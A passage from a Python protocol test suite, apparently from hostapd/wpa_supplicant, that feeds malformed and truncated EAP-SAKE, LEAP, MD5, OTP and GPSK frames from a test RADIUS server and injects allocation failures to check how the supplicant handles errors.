return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
global eap_proto_sake_test_done
if eap_proto_sake_test_done:
return sake_challenge(ctx)
logger.info("No more test responses available - test case completed")
eap_proto_sake_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(sake_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
while not eap_proto_sake_test_done:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
logger.info("Too short password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
finally:
stop_radius_server(srv)
def test_eap_proto_sake_errors(dev, apdev):
"""EAP-SAKE local error cases"""
check_eap_capa(dev[0], "SAKE")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_sake_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ ( 1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_challenge" ),
( 1, "=eap_sake_process_challenge" ),
( 1, "eap_sake_compute_mic;eap_sake_process_challenge" ),
( 1, "eap_sake_build_msg;eap_sake_process_confirm" ),
( 1, "eap_sake_compute_mic;eap_sake_process_confirm" ),
( 2, "eap_sake_compute_mic;eap_sake_process_confirm" ),
( 1, "eap_sake_getKey" ),
( 1, "eap_sake_get_emsk" ),
( 1, "eap_sake_get_session_id" ) ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_sake_process_challenge"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_sake_errors2(dev, apdev):
"""EAP-SAKE protocol tests (2)"""
def sake_handler(ctx, req):
logger.info("sake_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
srv = start_radius_server(sake_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_identity"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def test_eap_proto_leap(dev, apdev):
"""EAP-LEAP protocol tests"""
check_eap_capa(dev[0], "LEAP")
def leap_handler(ctx, req):
logger.info("leap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 2:
logger.info("Test: Unexpected version")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 0)
if ctx['num'] == 3:
logger.info("Test: Invalid challenge length")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 4:
logger.info("Test: Truncated challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 8)
if ctx['num'] == 5:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 6:
logger.info("Test: Missing payload in Response")
return struct.pack(">BBHB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 7:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 8:
logger.info("Test: Unexpected version in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 8)
if ctx['num'] == 9:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 10:
logger.info("Test: Invalid challenge length in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 11:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 12:
logger.info("Test: Truncated challenge in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 24)
if ctx['num'] == 13:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 14:
logger.info("Test: Invalid challange value in Response")
return struct.pack(">BBHBBBB6L", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0, 0, 0, 0, 0, 0)
if ctx['num'] == 15:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 16:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
if ctx['num'] == 17:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 18:
logger.info("Test: Success")
return struct.pack(">BBHB", EAP_CODE_SUCCESS, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
# hostapd will drop the next frame in the sequence
if ctx['num'] == 19:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 20:
logger.info("Test: Failure")
return struct.pack(">BBHB", EAP_CODE_FAILURE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
return None
srv = start_radius_server(leap_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 12):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
if i == 10:
logger.info("Wait for additional roundtrip")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_leap_errors(dev, apdev):
"""EAP-LEAP protocol tests (error paths)"""
check_eap_capa(dev[0], "LEAP")
def leap_handler2(ctx, req):
logger.info("leap_handler2 - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(leap_handler2)
try:
hapd = start_ap(apdev[0]['ifname'])
with alloc_fail(dev[0], 1, "eap_leap_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_leap_process_request"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_leap_process_success"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_leap_process_success"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "eap_leap_process_response"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "nt_password_hash;eap_leap_process_response"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "hash_nt_password_hash;eap_leap_process_response"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "nt_password_hash;eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "hash_nt_password_hash;eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def test_eap_proto_md5(dev, apdev):
"""EAP-MD5 protocol tests"""
check_eap_capa(dev[0], "MD5")
def md5_handler(ctx, req):
logger.info("md5_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_MD5)
if ctx['num'] == 2:
logger.info("Test: Zero-length challenge")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_MD5,
0)
if ctx['num'] == 3:
logger.info("Test: Truncated challenge")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_MD5,
1)
if ctx['num'] == 4:
logger.info("Test: Shortest possible challenge and name")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
return None
srv = start_radius_server(md5_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 4):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_md5_errors(dev, apdev):
"""EAP-MD5 local error cases"""
check_eap_capa(dev[0], "MD5")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
with fail_test(dev[0], 1, "chap_md5"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="phase1-user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_md5_process"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="phase1-user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
def test_eap_proto_otp(dev, apdev):
"""EAP-OTP protocol tests"""
def otp_handler(ctx, req):
logger.info("otp_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Empty payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_OTP)
if ctx['num'] == 2:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
4)
if ctx['num'] == 3:
logger.info("Test: Challenge included")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_OTP,
ord('A'))
if ctx['num'] == 4:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
4)
return None
srv = start_radius_server(otp_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 1):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-OTP"])
if ev is None:
raise Exception("Request for password timed out")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-OTP-" + id + ":password")
ev = dev[0].wait_event("CTRL-EVENT-EAP-SUCCESS")
if ev is None:
raise Exception("Success not reported")
finally:
stop_radius_server(srv)
def test_eap_proto_otp_errors(dev, apdev):
"""EAP-OTP local error cases"""
def otp_handler2(ctx, req):
logger.info("otp_handler2 - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge included")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_OTP,
ord('A'))
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(otp_handler2)
try:
hapd = start_ap(apdev[0]['ifname'])
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_otp_process"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
EAP_GPSK_OPCODE_GPSK_1 = 1
EAP_GPSK_OPCODE_GPSK_2 = 2
EAP_GPSK_OPCODE_GPSK_3 = 3
EAP_GPSK_OPCODE_GPSK_4 = 4
EAP_GPSK_OPCODE_FAIL = 5
EAP_GPSK_OPCODE_PROTECTED_FAIL = 6
def test_eap_proto_gpsk(dev, apdev):
"""EAP-GPSK protocol tests"""
def gpsk_handler(ctx, req):
logger.info("gpsk_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_GPSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown opcode")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected GPSK-3")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Too short GPSK-1")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Truncated ID_Server")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Missing RAND_Server")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Missing CSuite_List")
return struct.pack(">BBHBBH8L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Truncated CSuite_List")
return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Empty CSuite_List")
return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2,
EAP_TYPE_GPSK,
